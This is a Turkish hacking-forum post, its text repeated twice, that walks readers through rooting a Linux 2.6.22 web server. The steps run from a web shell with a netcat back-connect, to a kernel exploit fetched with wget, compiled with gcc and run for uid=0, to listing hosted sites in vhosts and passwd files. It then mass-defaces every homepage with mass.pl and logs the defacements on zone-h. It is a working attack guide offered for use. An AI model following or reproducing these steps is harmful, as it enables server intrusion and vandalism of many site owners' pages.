NasyoneL
- 25 Ağu 2017
- 25,060 Mesaj
Aktiflik
Seviye
Deneyim
Gerekenler :
1) netcat (for back connect)
2) shell
3) mass.pl (çoklu deface için indexleyicidir)
4) zone-h.pl (çoklu deface kaydı içindir)
5) index
-
-
-
-
-
-
shellimizde de bu yazı çıktıktan sonra dos ekranına donelim baglandık mı bakalım.
-
-
evet baglandık serverimiz 2007 sürümü 2.6.22
exploitimizi googledan veya milw0rm türü sitelerden dan arayıp bulduktan sonra
serverin yazma silme izni olan bi klasorune atıyoruz genelde tmp ye atılır tmp dizinleri iki kısımdır birisi dizin olarak /tmp dizinindedir diğeri ise /home1/corppmco/public_html/tmp dizinindedir
ikinci verdiğim joomla sitelerdedir.
wget komutuyla exploiti server upload edelim ornek olarak
wget http://xxx.com/2.6.22.c
exploitlerin uzantısı c dir c diliyle yazıldıklarından dolayı
not: bazı serverlar wget komutunu kabul etmez shellden manuel upload da uygun bir yoldur.
attıgımız exploiti derleyecegiz şimdi ( derleme işleminde yeni isim verecegiz)
gcc -o root 2.6.22.c (root yazdımız yere istediginizi yazabilirsiniz)
chmod ayarı yapacagız
chmod 777 root dedikten sonra explotimizi çağırmaya geldi sıra
./root diyerek exploitimizi çağırıyoruz (alttaki resimde oldugu gibi)
-
-
bazen hemen bazen bi süre bekledikten sonra cevap gelir sabırlı olun
id komutuyla kontrol edelim
-
-
evet serverimiz rootlandı
whoami komutuylada bu görüyoruz (verdiğimiz isim çıkmalıdır)
uid=0 ı gorduk
şimdi musait bi yere indeximizi ve mass.pl yi atalım
serverdakileri siteleri gormek içinse çok çeşitli yollarımız mevcuttur
bu komutlar :
/etc/vdomainaliases/
/etc/vfilters/
/var/www/vhosts/
/var/named/
/etc/passwd/
/etc/hosts/
/etc/apache/
/etc/apache2/
/etc/named.conf/ gibi
bizimki /var/www/vhosts/ cd /var/www/hosts/ komutunu verdikten sonra
ls (LS yani) komutuyla sıralayıp gorebiliriz yada izinler açıksa shellden o dizine gecebiliriz
-
-
siteleri bulup bilgisayarımızda C:/Perl/bin/ klasorunun içine hack.txt diyer kayıt edin.(bilgilsayarınızda perl Programı yuklu olmalıdır)
kayıt ettikten sonra dos ekranında mass deface işlemine gecelim
-
-
önce ekrana perl mas.pl yazıp nasıl çalıştıgınız kontrol ediyoruz daha sonra uygulamaya geciyoruz (orda example ı veriyor)
mass deface biraz zaman alabilir sabırlı olmak gerek
işlem bitince all homepages defaced diye bi yazı gelecek bu yazıdan sonra yine başlat çalıştır cmd ye geliyoruz
cd..
cd..
cd perl
cd bin
perl zoneh.pl hack.txt Kam_06 (nickimi yazdım) yazıp enter diyoruz-
1) netcat (for back connect)
2) shell
3) mass.pl (çoklu deface için indexleyicidir)
4) zone-h.pl (çoklu deface kaydı içindir)
5) index
-
-
-
shellimizde de bu yazı çıktıktan sonra dos ekranına donelim baglandık mı bakalım.
-
evet baglandık serverimiz 2007 sürümü 2.6.22
exploitimizi googledan veya milw0rm türü sitelerden dan arayıp bulduktan sonra
serverin yazma silme izni olan bi klasorune atıyoruz genelde tmp ye atılır tmp dizinleri iki kısımdır birisi dizin olarak /tmp dizinindedir diğeri ise /home1/corppmco/public_html/tmp dizinindedir
ikinci verdiğim joomla sitelerdedir.
wget komutuyla exploiti server upload edelim ornek olarak
wget http://xxx.com/2.6.22.c
exploitlerin uzantısı c dir c diliyle yazıldıklarından dolayı
not: bazı serverlar wget komutunu kabul etmez shellden manuel upload da uygun bir yoldur.
attıgımız exploiti derleyecegiz şimdi ( derleme işleminde yeni isim verecegiz)
gcc -o root 2.6.22.c (root yazdımız yere istediginizi yazabilirsiniz)
chmod ayarı yapacagız
chmod 777 root dedikten sonra explotimizi çağırmaya geldi sıra
./root diyerek exploitimizi çağırıyoruz (alttaki resimde oldugu gibi)
-
bazen hemen bazen bi süre bekledikten sonra cevap gelir sabırlı olun
id komutuyla kontrol edelim
-
evet serverimiz rootlandı
whoami komutuylada bu görüyoruz (verdiğimiz isim çıkmalıdır)
uid=0 ı gorduk
şimdi musait bi yere indeximizi ve mass.pl yi atalım
serverdakileri siteleri gormek içinse çok çeşitli yollarımız mevcuttur
bu komutlar :
/etc/vdomainaliases/
/etc/vfilters/
/var/www/vhosts/
/var/named/
/etc/passwd/
/etc/hosts/
/etc/apache/
/etc/apache2/
/etc/named.conf/ gibi
bizimki /var/www/vhosts/ cd /var/www/hosts/ komutunu verdikten sonra
ls (LS yani) komutuyla sıralayıp gorebiliriz yada izinler açıksa shellden o dizine gecebiliriz
-
siteleri bulup bilgisayarımızda C:/Perl/bin/ klasorunun içine hack.txt diyer kayıt edin.(bilgilsayarınızda perl Programı yuklu olmalıdır)
kayıt ettikten sonra dos ekranında mass deface işlemine gecelim
-
önce ekrana perl mas.pl yazıp nasıl çalıştıgınız kontrol ediyoruz daha sonra uygulamaya geciyoruz (orda example ı veriyor)
mass deface biraz zaman alabilir sabırlı olmak gerek
işlem bitince all homepages defaced diye bi yazı gelecek bu yazıdan sonra yine başlat çalıştır cmd ye geliyoruz
cd..
cd..
cd perl
cd bin
perl zoneh.pl hack.txt Kam_06 (nickimi yazdım) yazıp enter diyoruz-


